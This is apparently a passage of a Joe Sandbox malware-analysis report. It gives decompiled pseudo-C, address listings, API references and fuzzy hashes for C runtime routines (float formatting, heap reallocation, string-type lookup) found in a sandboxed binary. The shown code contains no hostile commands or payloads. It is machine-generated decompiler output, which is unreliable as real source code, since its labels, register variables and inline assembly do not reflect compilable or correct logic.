								_v12 = 0xf0000;
								do {
									__eflags = _a16;
									if(_a16 <= 0) {
										break;
									}
									_t137 = E004121F0( *_t203 & _v16, _v8, _t203[1] & _v12 & 0x000fffff) + 0x00000030 & 0x0000ffff;
									__eflags = _t137 - 0x39;
									if(_t137 > 0x39) {
										_t137 = _t137 + _t154;
										__eflags = _t137;
									}
									_t180 = _v12;
									_v8 = _v8 - 4;
									 *_t210 = _t137;
									_t210 = _t210 + 1;
									_a16 = _a16 - 1;
									__eflags = _v8;
									_v16 = (_t180 << 0x00000020 | _v16) >> 4;
									_v12 = _t180 >> 4;
								} while (_v8 >= 0);
								__eflags = _v8;
								if(_v8 < 0) {
									goto L50;
								}
								_t131 = E004121F0( *_t203 & _v16, _v8, _t203[1] & _v12 & 0x000fffff);
								__eflags = _t131 - 8;
								if(_t131 <= 8) {
									goto L50;
								}
								_t132 = _t210 - 1;
								while(1) {
									_t176 =  *_t132;
									__eflags = _t176 - 0x66;
									if(_t176 == 0x66) {
										goto L44;
									}
									__eflags = _t176 - 0x46;
									if(_t176 != 0x46) {
										__eflags = _t132 - _a8;
										if(_t132 == _a8) {
											_t72 = _t132 - 1;
											 *_t72 =  *(_t132 - 1) + 1;
											__eflags =  *_t72;
										} else {
											_t177 =  *_t132;
											__eflags = _t177 - 0x39;
											if(_t177 != 0x39) {
												 *_t132 = _t177 + 1;
											} else {
												 *_t132 = _t154 + 0x3a;
											}
										}
										goto L50;
									}
									L44:
									 *_t132 = 0x30;
									_t132 = _t132 - 1;
								}
							} else {
								__eflags = _t109;
								if(_t109 <= 0) {
									L50:
									__eflags = _a16;
									if(_a16 > 0) {
										E0040FE20(_t203, _t210, 0x30, _a16);
										_t210 = _t210 + _a16;
										__eflags = _t210;
									}
									_t110 = _a8;
									__eflags =  *_t110;
									if( *_t110 == 0) {
										_t210 = _t110;
									}
									__eflags = _a20;
									 *_t210 = ((_t110 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
									_t194 = _t203[1];
									_t211 = _t210 + 1;
									_t116 = E004121F0( *_t203, 0x34, _t194);
									_t195 = _t194 & 0;
									_t118 = (_t116 & 0x000007ff) - _v24;
									__eflags = _t118;
									_push(0);
									_pop(0x3e8);
									asm("sbb edx, ecx");
									if(__eflags < 0) {
										L58:
										 *_t211 = 0x2d;
										_t212 = _t211 + 1;
										__eflags = _t212;
										_t118 =  ~_t118;
										asm("adc edx, ebx");
										_t195 =  ~_t195;
										goto L59;
									} else {
										if(__eflags > 0) {
											L57:
											 *_t211 = 0x2b;
											_t212 = _t211 + 1;
											L59:
											__eflags = _t195;
											_t204 = _t212;
											 *_t212 = 0x30;
											if(__eflags < 0) {
												L63:
												__eflags = _t195;
												if(__eflags < 0) {
													L67:
													__eflags = _t212 - _t204;
													if(_t212 != _t204) {
														L71:
														_push(0);
														_push(0xa);
														_push(_t195);
														_push(_t118);
														 *_t212 = E00412110() + 0x30;
														_v20 = _t195;
														_t212 = _t212 + 1;
														__eflags = _t212;
														_t118 = 0x3e8;
														_v20 = 0;
														L72:
														_t121 = _t118 + 0x30;
														__eflags = _t121;
														 *_t212 = _t121;
														 *(_t212 + 1) = 0;
														L73:
														__eflags = _v28;
														if(_v28 != 0) {
															_t123 = _v32;
															_t90 = _t123 + 0x70;
															 *_t90 =  *(_t123 + 0x70) & 0xfffffffd;
															__eflags =  *_t90;
														}
														_t122 = 0;
														__eflags = 0;
														L76:
														return _t122;
													}
													__eflags = _t195;
													if(__eflags < 0) {
														goto L72;
													}
													if(__eflags > 0) {
														goto L71;
													}
													__eflags = _t118 - 0xa;
													if(_t118 < 0xa) {
														goto L72;
													}
													goto L71;
												}
												if(__eflags > 0) {
													L66:
													_push(0);
													_push(0x64);
													_push(_t195);
													_push(_t118);
													 *_t212 = E00412110() + 0x30;
													_v20 = _t195;
													_t212 = _t212 + 1;
													__eflags = _t212;
													_t118 = 0x3e8;
													_t195 = 0;
													goto L67;
												}
												__eflags = _t118 - 0x64;
												if(_t118 < 0x64) {
													goto L67;
												}
												goto L66;
											}
											if(__eflags > 0) {
												L62:
												_push(0);
												_push(0x3e8);
												_push(_t195);
												_push(_t118);
												 *_t212 = E00412110() + 0x30;
												_t212 = _t212 + 1;
												__eflags = _t212 - _t204;
												_v20 = _t195;
												_t118 = 0x3e8;
												_t195 = 0;
												if(_t212 != _t204) {
													goto L66;
												}
												goto L63;
											}
											__eflags = _t118 - 0x3e8;
											if(_t118 < 0x3e8) {
												goto L63;
											}
											goto L62;
										}
										__eflags = _t118;
										if(_t118 < 0) {
											goto L58;
										}
										goto L57;
									}
								}
								goto L34;
							}
						}
						__eflags = 0;
						if(0 != 0) {
							goto L22;
						}
						_t142 = _a12;
						__eflags = _t142 - 0xffffffff;
						if(_t142 != 0xffffffff) {
							_t143 = _t142 + 0xfffffffe;
							__eflags = _t142 + 0xfffffffe;
						} else {
							_t143 = _t142;
						}
						_t158 = _t205 + 2;
						_t122 = E0040DA58(_t203, _t158, _t143, _a16, 0);
						__eflags = _t122;
						if(_t122 == 0) {
							__eflags =  *_t158 - 0x2d;
							if( *_t158 == 0x2d) {
								 *_t205 = 0x2d;
								_t205 = _t205 + 1;
								__eflags = _t205;
							}
							 *_t205 = 0x30;
							__eflags = _a20;
							 *(_t205 + 1) = ((_t122 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
							_t148 = E00411870(_t162, _t205 + 2, 0x65);
							__eflags = _t148;
							_pop(_t185);
							if(_t148 != 0) {
								__eflags = _a20;
								 *_t148 = ((_t185 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								 *((char*)(_t148 + 3)) = 0;
							}
							goto L73;
						} else {
							__eflags = _v28;
							 *_t205 = 0;
							if(_v28 != 0) {
								 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
							}
							goto L76;
						}
					} else {
						_t93 = E0040D198(__eflags);
						_push(0x22);
						L4:
						_pop(_t206);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						 *_t93 = _t206;
						E0040CB22(_t149, _t191, 0);
						if(_v28 != 0) {
							 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
						}
						return _t206;
					}
				}
				L3:
				_t93 = E0040D198(_t220);
				_push(0x16);
				goto L4;
			}

0x0040da76
0x0040da76
0x0040da84
0x0040da8d
0x0040da94
0x0040da9c
0x0040da9e
0x0040da9e
0x0040daa1
0x0040daa4
0x0040daa6
0x0040dad3
0x0040dad6
0x00000000
0x00000000
0x0040dade
0x0040dae1
0x0040dae4
0x0040daef
0x0040daf4
0x0040daf7
0x0040db04
0x0040db05
0x0040db09
0x0040db0b
0x0040dba1
0x0040dba1
0x0040dba8
0x0040dbaa
0x0040dbac
0x0040dbaf
0x0040dbaf
0x0040dbaf
0x0040dbb0
0x0040dbb3
0x0040dbb6
0x0040dbb7
0x0040dbc2
0x0040dbc7
0x0040dbca
0x0040dbd7
0x0040dbdc
0x0040dbde
0x0040dc01
0x0040dc04
0x0040dc04
0x0040dbe0
0x0040dbe0
0x0040dbee
0x0040dbef
0x0040dbf1
0x0040dbf8
0x0040dbf3
0x0040dbf3
0x0040dbf3
0x0040dbf1
0x0040dc05
0x0040dc07
0x0040dc08
0x0040dc0b
0x0040dc0e
0x0040dc21
0x0040dc10
0x0040dc10
0x0040dc10
0x0040dc26
0x0040dc28
0x0040dc28
0x0040dc2e
0x0040dc31
0x0040dc3b
0x0040dc3b
0x0040dc3e
0x0040dc45
0x0040dc45
0x0040dc49
0x00000000
0x00000000
0x0040dc69
0x0040dc6c
0x0040dc70
0x0040dc72
0x0040dc72
0x0040dc72
0x0040dc74
0x0040dc77
0x0040dc7b
0x0040dc87
0x0040dc88
0x0040dc8b
0x0040dc90
0x0040dc93
0x0040dc93
0x0040dc98
0x0040dc9d
0x00000000
0x00000000
0x0040dcb4
0x0040dcb9
0x0040dcbd
0x00000000
0x00000000
0x0040dcbf
0x0040dcc2
0x0040dcc2
0x0040dcc4
0x0040dcc7
0x00000000
0x00000000
0x0040dcc9
0x0040dccc
0x0040dcd4
0x0040dcd7
0x0040dced
0x0040dced
0x0040dced
0x0040dcd9
0x0040dcd9
0x0040dcdb
0x0040dcde
0x0040dce9
0x0040dce0
0x0040dce3
0x0040dce3
0x0040dcde
0x00000000
0x0040dcd7
0x0040dcce
0x0040dcce
0x0040dcd1
0x0040dcd1
0x0040dc33
0x0040dc33
0x0040dc35
0x0040dcf0
0x0040dcf0
0x0040dcf4
0x0040dcfc
0x0040dd04
0x0040dd04
0x0040dd04
0x0040dd07
0x0040dd0a
0x0040dd0d
0x0040dd0f
0x0040dd0f
0x0040dd11
0x0040dd20
0x0040dd24
0x0040dd27
0x0040dd28
0x0040dd34
0x0040dd36
0x0040dd36
0x0040dd39
0x0040dd3a
0x0040dd3b
0x0040dd3d
0x0040dd4b
0x0040dd4b
0x0040dd4e
0x0040dd4e
0x0040dd4f
0x0040dd51
0x0040dd53
0x00000000
0x0040dd3f
0x0040dd3f
0x0040dd45
0x0040dd45
0x0040dd48
0x0040dd55
0x0040dd55
0x0040dd57
0x0040dd59
0x0040dd5c
0x0040dd82
0x0040dd82
0x0040dd84
0x0040dda4
0x0040dda4
0x0040dda6
0x0040ddb3
0x0040ddb3
0x0040ddb5
0x0040ddb7
0x0040ddb8
0x0040ddc0
0x0040ddc2
0x0040ddc5
0x0040ddc5
0x0040ddc6
0x0040ddc8
0x0040ddcb
0x0040ddcb
0x0040ddcb
0x0040ddcd
0x0040ddcf
0x0040ddd3
0x0040ddd3
0x0040ddd7
0x0040ddd9
0x0040dddc
0x0040dddc
0x0040dddc
0x0040dddc
0x0040dde0
0x0040dde0
0x0040dde2
0x00000000
0x0040dde2
0x0040dda8
0x0040ddaa
0x00000000
0x00000000
0x0040ddac
0x00000000
0x00000000
0x0040ddae
0x0040ddb1
0x00000000
0x00000000
0x00000000
0x0040ddb1
0x0040dd86
0x0040dd8d
0x0040dd8d
0x0040dd8f
0x0040dd91
0x0040dd92
0x0040dd9a
0x0040dd9c
0x0040dd9f
0x0040dd9f
0x0040dda0
0x0040dda2
0x00000000
0x0040dda2
0x0040dd88
0x0040dd8b
0x00000000
0x00000000
0x00000000
0x0040dd8b
0x0040dd63
0x0040dd69
0x0040dd69
0x0040dd6a
0x0040dd6b
0x0040dd6c
0x0040dd74
0x0040dd76
0x0040dd77
0x0040dd79
0x0040dd7c
0x0040dd7e
0x0040dd80
0x00000000
0x00000000
0x00000000
0x0040dd80
0x0040dd65
0x0040dd67
0x00000000
0x00000000
0x00000000
0x0040dd67
0x0040dd41
0x0040dd43
0x00000000
0x00000000
0x00000000
0x0040dd43
0x0040dd3d
0x00000000
0x0040dc35
0x0040dc31
0x0040db11
0x0040db13
0x00000000
0x00000000
0x0040db19
0x0040db1c
0x0040db1f
0x0040db25
0x0040db25
0x0040db21
0x0040db21
0x0040db21
0x0040db2d
0x0040db33
0x0040db3b
0x0040db3d
0x0040db58
0x0040db5b
0x0040db5d
0x0040db60
0x0040db60
0x0040db60
0x0040db61
0x0040db65
0x0040db74
0x0040db78
0x0040db7d
0x0040db80
0x0040db81
0x0040db87
0x0040db96
0x0040db98
0x0040db98
0x00000000
0x0040db3f
0x0040db3f
0x0040db43
0x0040db46
0x0040db4f
0x0040db4f
0x00000000
0x0040db46
0x0040dae6
0x0040dae6
0x0040daeb
0x0040daaf
0x0040daaf
0x0040dab0
0x0040dab1
0x0040dab2
0x0040dab3
0x0040dab4
0x0040dab5
0x0040dab7
0x0040dac3
0x0040dac8
0x0040dac8
0x00000000
0x0040dacc
0x0040dae4
0x0040daa8
0x0040daa8
0x0040daad
0x00000000

APIs

__cftoa.LIBCMT ref: 0040DB33
_strrchr.LIBCMT ref: 0040DB78
__alldvrm.INT64 ref: 0040DD6D
__alldvrm.INT64 ref: 0040DD93
__alldvrm.INT64 ref: 0040DDB9

Strings

0, xrefs: 0040DA8D

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: __alldvrm$__cftoa_strrchr
String ID: 0
API String ID: 4146837300-4108050209
Opcode ID: bb379f49618245c50236eee69d93a0d27f70e72541a829d4372d7485cdd14973
Instruction ID: 23c80e39a6094f56edf2e2e9f13ffced6d8a4fb1d28ba861214ab2868c064bb5
Opcode Fuzzy Hash: bb379f49618245c50236eee69d93a0d27f70e72541a829d4372d7485cdd14973
Instruction Fuzzy Hash: 90C10371D042469FEB159FA8C8817AEBBA0EF51304F24417FD891A73C1D3BC994AC79A

Function 004138E9, Relevance: 9.2, APIs: 6, Instructions: 181memory

APIs

GetLastError.KERNEL32 ref: 00413AF1

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93

___sbh_resize_block.LIBC ref: 00413960
RtlAllocateHeap.NTDLL(00000000,?), ref: 004139C6

Part of subcall function 0040E254: HeapFree.KERNEL32(00000000,00000000), ref: 0040E508

RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 00413A1D
GetLastError.KERNEL32 ref: 00413A64
RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 00413A9E

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocateErrorLast$Free$___sbh_resize_block
String ID:
API String ID: 4098171645-0
Opcode ID: 6ea157b72186a50ec11fff56a1ead13efffffec92ceb3ed8986761702809405c
Instruction ID: 9110507b3a0649f73c8a29543f7f928737e39a5a198da3b160725d8c481b4db1
Opcode Fuzzy Hash: 6ea157b72186a50ec11fff56a1ead13efffffec92ceb3ed8986761702809405c
Instruction Fuzzy Hash: 9D511A71D04215AACF217F669C44AEF7A28EF403A5B11452BF895A73D1EB3C4EC08B9D

Function 004138E9, Relevance: 9.2, APIs: 6, Instructions: 181
memory

C-Code - Quality: 65%

			E004138E9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t26;
				long _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t37;
				long _t39;
				void* _t43;
				long _t45;
				long _t48;
				long _t49;
				long _t51;
				long _t53;
				void* _t57;
				long _t70;
				long _t73;
				void* _t79;
				void* _t80;

				_push(0x10);
				_push(0x418e20);
				E0040D48C(__ebx, __edi, __esi);
				_t57 =  *(_t79 + 8);
				if(_t57 != 0) {
					_t73 =  *(_t79 + 0xc);
					__eflags = _t73;
					if(__eflags != 0) {
						__eflags =  *0x436be0 - 3;
						if( *0x436be0 != 3) {
							while(1) {
								__eflags = _t73 - 0xffffffe0;
								if(_t73 > 0xffffffe0) {
									break;
								}
								__eflags = _t73;
								if(_t73 == 0) {
									_t73 = _t73 + 1;
									__eflags = _t73;
								}
								_t26 = HeapReAlloc( *0x436214, 0, _t57, _t73);
								_t70 = _t26;
								__eflags = _t70;
								if(_t70 != 0) {
									L48:
									_t27 = _t70;
									goto L43;
								} else {
									__eflags =  *0x436530 - _t26;
									if( *0x436530 == _t26) {
										__eflags = _t70;
										if(__eflags != 0) {
											goto L48;
										}
										_t29 = E0040D198(__eflags);
										L47:
										 *_t29 = E0040D15D(GetLastError());
										goto L48;
									}
									__eflags = E0040EF78(_t73);
									if(__eflags == 0) {
										_t33 = E0040D198(__eflags);
										L30:
										 *_t33 = E0040D15D(GetLastError());
										goto L42;
									}
									continue;
								}
							}
							L40:
							E0040EF78(_t73);
							_t37 = E0040D198(__eflags);
							L41:
							 *_t37 = 0xc;
							goto L42;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t79 - 0x1c) = 0;
							__eflags = _t73 - 0xffffffe0;
							if(_t73 > 0xffffffe0) {
								goto L40;
							}
							E0040D43F(_t57, 0, 4);
							 *((intOrPtr*)(_t79 - 4)) = 0;
							_t39 = E0040E229(_t57);
							 *(_t79 - 0x20) = _t39;
							__eflags = _t39;
							if(_t39 == 0) {
								L21:
								 *((intOrPtr*)(_t79 - 4)) = 0xfffffffe;
								E00413A2D();
								__eflags =  *(_t79 - 0x20);
								if( *(_t79 - 0x20) != 0) {
									_t70 =  *(_t79 - 0x1c);
								} else {
									__eflags = _t73;
									if(_t73 == 0) {
										_t73 = _t73 + 1;
										__eflags = _t73;
									}
									_t73 = _t73 + 0x0000000f & 0xfffffff0;
									 *(_t79 + 0xc) = _t73;
									_t70 = HeapReAlloc( *0x436214, 0, _t57, _t73);
								}
								__eflags = _t70;
								if(_t70 != 0) {
									goto L48;
								} else {
									__eflags =  *0x436530 - _t70;
									if( *0x436530 == _t70) {
										__eflags = _t70;
										if(__eflags != 0) {
											goto L48;
										}
										_t29 = E0040D198(__eflags);
										__eflags =  *(_t79 - 0x20) - _t70;
										if( *(_t79 - 0x20) == _t70) {
											goto L47;
										}
										 *_t29 = 0xc;
										goto L48;
									}
									__eflags = E0040EF78(_t73);
									if(__eflags != 0) {
										continue;
									}
									_t37 = E0040D198(__eflags);
									__eflags =  *(_t79 - 0x20) - _t70;
									if( *(_t79 - 0x20) != _t70) {
										goto L41;
									}
									goto L30;
								}
							}
							__eflags = _t73 -  *0x436bec; // 0x0
							if(__eflags <= 0) {
								_push(_t73);
								_push(_t57);
								_push(_t39);
								_t48 = E0040E71E();
								_t80 = _t80 + 0xc;
								__eflags = _t48;
								if(_t48 == 0) {
									_push(_t73);
									_t49 = E0040E9FD();
									 *(_t79 - 0x1c) = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t9 = _t57 - 4; // 0x983b
										_t51 =  *_t9 - 1;
										__eflags = _t51 - _t73;
										if(_t51 >= _t73) {
											_t51 = _t73;
										}
										E004125F0(_t57, 0, _t73,  *(_t79 - 0x1c), _t57, _t51);
										_t53 = E0040E229(_t57);
										 *(_t79 - 0x20) = _t53;
										_push(_t57);
										_push(_t53);
										E0040E254();
										_t80 = _t80 + 0x18;
									}
								} else {
									 *(_t79 - 0x1c) = _t57;
								}
							}
							__eflags =  *(_t79 - 0x1c);
							if( *(_t79 - 0x1c) == 0) {
								__eflags = _t73;
								if(_t73 == 0) {
									_t73 = 1;
									__eflags = 1;
									 *(_t79 + 0xc) = 1;
								}
								_t73 = _t73 + 0x0000000f & 0xfffffff0;
								 *(_t79 + 0xc) = _t73;
								_t43 = HeapAlloc( *0x436214, 0, _t73);
								 *(_t79 - 0x1c) = _t43;
								__eflags = _t43;
								if(_t43 != 0) {
									_t16 = _t57 - 4; // 0x983b
									_t45 =  *_t16 - 1;
									__eflags = _t45 - _t73;
									if(_t45 >= _t73) {
										_t45 = _t73;
									}
									E004125F0(_t57, 0, _t73,  *(_t79 - 0x1c), _t57, _t45);
									_push(_t57);
									_push( *(_t79 - 0x20));
									E0040E254();
									_t80 = _t80 + 0x14;
								}
							}
							goto L21;
						}
						goto L40;
					} else {
						_push(_t57);
						E00410D1A(_t57, __edi, _t73, __eflags);
						L42:
						_t27 = 0;
						__eflags = 0;
						goto L43;
					}
				} else {
					_t27 = E0040C70A(_t57, __edx, __edi, __esi,  *(_t79 + 0xc));
					L43:
					return E0040D4D1(_t27);
				}
			}

0x004138e9
0x004138eb
0x004138f0
0x004138f5
0x004138fa
0x0041390a
0x0041390d
0x0041390f
0x0041391d
0x00413924
0x00413abd
0x00413abd
0x00413ac0
0x00000000
0x00000000
0x00413a8f
0x00413a91
0x00413a93
0x00413a93
0x00413a93
0x00413a9e
0x00413aa4
0x00413aa6
0x00413aa8
0x00413b00
0x00413b00
0x00000000
0x00413aaa
0x00413aaa
0x00413ab0
0x00413ae6
0x00413ae8
0x00000000
0x00000000
0x00413aea
0x00413aef
0x00413afd
0x00000000
0x00413aff
0x00413ab9
0x00413abb
0x00413adc
0x00413a62
0x00413a71
0x00000000
0x00413a71
0x00000000
0x00413abb
0x00413aa8
0x00413ac2
0x00413ac3
0x00413ac9
0x00413ace
0x00413ace
0x00000000
0x00000000
0x00000000
0x00000000
0x0041392a
0x0041392a
0x0041392c
0x0041392f
0x00413932
0x00000000
0x00000000
0x0041393a
0x00413940
0x00413944
0x0041394a
0x0041394d
0x0041394f
0x004139f3
0x004139f3
0x004139fa
0x004139ff
0x00413a03
0x00413a36
0x00413a05
0x00413a05
0x00413a07
0x00413a09
0x00413a09
0x00413a09
0x00413a0d
0x00413a10
0x00413a23
0x00413a23
0x00413a39
0x00413a3b
0x00000000
0x00413a41
0x00413a41
0x00413a47
0x00413a75
0x00413a77
0x00000000
0x00000000
0x00413a7d
0x00413a82
0x00413a85
0x00000000
0x00000000
0x00413a87
0x00000000
0x00413a87
0x00413a50
0x00413a52
0x00000000
0x00000000
0x00413a58
0x00413a5d
0x00413a60
0x00000000
0x00000000
0x00000000
0x00413a60
0x00413a3b
0x00413955
0x0041395b
0x0041395d
0x0041395e
0x0041395f
0x00413960
0x00413965
0x00413968
0x0041396a
0x00413971
0x00413972
0x00413978
0x0041397b
0x0041397d
0x0041397f
0x00413982
0x00413983
0x00413985
0x00413987
0x00413987
0x0041398e
0x00413994
0x00413999
0x0041399c
0x0041399d
0x0041399e
0x004139a3
0x004139a3
0x0041396c
0x0041396c
0x0041396c
0x0041396a
0x004139a6
0x004139a9
0x004139ab
0x004139ad
0x004139b1
0x004139b1
0x004139b2
0x004139b2
0x004139b8
0x004139bb
0x004139c6
0x004139cc
0x004139cf
0x004139d1
0x004139d3
0x004139d6
0x004139d7
0x004139d9
0x004139db
0x004139db
0x004139e2
0x004139e7
0x004139e8
0x004139eb
0x004139f0
0x004139f0
0x004139d1
0x00000000
0x004139a9
0x00000000
0x00413911
0x00413911
0x00413912
0x00413ad4
0x00413ad4
0x00413ad4
0x00000000
0x00413ad4
0x004138fc
0x004138ff
0x00413ad6
0x00413adb
0x00413adb

APIs

GetLastError.KERNEL32 ref: 00413AF1

Part of subcall function 0040D43F: EnterCriticalSection.KERNEL32(?,?,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 0040D467

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

___sbh_resize_block.LIBC ref: 00413960
HeapAlloc.KERNEL32(00000000,00000001,00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1,00000004), ref: 004139C6

Part of subcall function 0040E254: VirtualFree.KERNEL32(?,00008000,00004000,00000000,00000000,00000001,00000000), ref: 0040E49B
Part of subcall function 0040E254: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040E4F6
Part of subcall function 0040E254: HeapFree.KERNEL32(00000000,?), ref: 0040E508

HeapReAlloc.KERNEL32(00000000,00402D4A,00000001,00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1), ref: 00413A1D
GetLastError.KERNEL32(00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1,00000004,00000002), ref: 00413A64
HeapReAlloc.KERNEL32(00000000,00402D4A,00000010,00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1), ref: 00413A9E

Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocFree$ErrorLast$Virtual$CriticalEnterSection___sbh_resize_block
String ID:
API String ID: 1978709766-0
Opcode ID: 8932e8b575111653ec71cf9ba94abce5e38b70348878fdf5c1e24e45f7e095fa
Instruction ID: 9110507b3a0649f73c8a29543f7f928737e39a5a198da3b160725d8c481b4db1
Opcode Fuzzy Hash: 8932e8b575111653ec71cf9ba94abce5e38b70348878fdf5c1e24e45f7e095fa
Instruction Fuzzy Hash: 9D511A71D04215AACF217F669C44AEF7A28EF403A5B11452BF895A73D1EB3C4EC08B9D

Function 00412F38, Relevance: 9.2, APIs: 6, Instructions: 165

C-Code - Quality: 88%

			E00412F38(intOrPtr* __ecx, intOrPtr __edx, int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				short _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				intOrPtr _t46;
				void* _t47;
				short _t48;
				short _t49;
				int _t63;
				short* _t67;
				long _t73;
				short* _t75;
				intOrPtr _t76;
				intOrPtr _t85;
				intOrPtr* _t87;
				short _t88;
				intOrPtr _t89;
				int _t90;
				char* _t92;
				intOrPtr _t93;
				signed int _t97;
				short* _t98;
				void* _t106;

				_t85 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t44 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t44 ^ _t97;
				_t46 =  *0x436a08; // 0x1
				_t75 = 0;
				_t87 = __ecx;
				if(_t46 != 0) {
					L6:
					__eflags = _t46 - 2;
					if(_t46 == 2) {
						L25:
						_t92 = 0;
						__eflags = _a24 - _t75;
						if(_a24 == _t75) {
							_a24 =  *((intOrPtr*)( *_t87 + 0x14));
						}
						__eflags = _a20 - _t75;
						if(_a20 == _t75) {
							_a20 =  *((intOrPtr*)( *_t87 + 4));
						}
						_t47 = E004134B0(_t75, _t85, _t87, _t92, _a24);
						__eflags = _t47 - 0xffffffff;
						if(_t47 != 0xffffffff) {
							__eflags = _t47 - _a20;
							if(_t47 == _a20) {
								L34:
								_t48 = GetStringTypeA(_a24, _a4, _a8, _a12, _a16);
								__eflags = _t92 - _t75;
								_t88 = _t48;
								if(__eflags != 0) {
									_push(_t92);
									E00410D1A(_t75, _t88, _t92, __eflags);
								}
								_t49 = _t88;
								goto L37;
							}
							_t92 = E004134F7(_t85, _a20, _t47, _a8,  &_a12, _t75, _t75);
							__eflags = _t92 - _t75;
							if(_t92 == _t75) {
								goto L30;
							}
							_a8 = _t92;
							goto L34;
						} else {
							L30:
							_t49 = 0;
							L37:
							_pop(_t89);
							_pop(_t93);
							_pop(_t76);
							return E0040FE9A(_t49, _t76, _v8 ^ _t97, _t85, _t89, _t93);
						}
					}
					__eflags = _t46 - _t75;
					if(_t46 == _t75) {
						goto L25;
					}
					__eflags = _t46 - 1;
					if(_t46 != 1) {
						goto L30;
					}
					L9:
					_v12 = _t75;
					if(_a20 == _t75) {
						_a20 =  *((intOrPtr*)( *_t87 + 4));
					}
					_t90 = MultiByteToWideChar(_a20, 1 + (0 | _a28 != _t75) * 8, _a8, _a12, _t75, _t75);
					_t106 = _t90 - _t75;
					if(_t106 == 0) {
						goto L30;
					} else {
						if(_t106 <= 0 || _t90 > 0x7ffffff0) {
							L21:
							if(_t75 == 0) {
								goto L30;
							}
							E0040FE20(_t90, _t75, 0, _t90 + _t90);
							_t63 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t75, _t90);
							if(_t63 != 0) {
								_v12 = GetStringTypeW(_a4, _t75, _t63, _a16);
							}
							E0041083E(_t75);
							_t49 = _v12;
							goto L37;
						} else {
							_t16 = _t90 + 8; // 0x8
							_t66 = _t90 + _t16;
							if(_t90 + _t16 > 0x400) {
								_t67 = E0040C70A(_t75, _t85, _t90, MultiByteToWideChar, _t66);
								__eflags = _t67 - _t75;
								if(_t67 == _t75) {
									L20:
									_t75 = _t67;
									goto L21;
								}
								 *_t67 = 0xdddd;
								L19:
								_t67 =  &(_t67[4]);
								goto L20;
							}
							E004136B0(_t66);
							_t67 = _t98;
							if(_t67 == _t75) {
								goto L20;
							}
							 *_t67 = 0xcccc;
							goto L19;
						}
					}
				}
				if(GetStringTypeW(1, 0x418118, 1,  &_v12) == 0) {
					_t73 = GetLastError();
					__eflags = _t73 - 0x78;
					if(_t73 != 0x78) {
						_t46 =  *0x436a08; // 0x1
					} else {
						_t46 = 2;
						 *0x436a08 = _t46;
					}
					goto L6;
				}
				 *0x436a08 = 1;
				goto L9;
			}

0x00412f38
0x00412f3b
0x00412f3c
0x00412f3d
0x00412f44
0x00412f47
0x00412f4e
0x00412f53
0x00412f55
0x00412f91
0x00412f91
0x00412f94
0x00413069
0x00413069
0x0041306b
0x0041306e
0x00413075
0x00413075
0x00413078
0x0041307b
0x00413082
0x00413082
0x00413088
0x0041308d
0x00413091
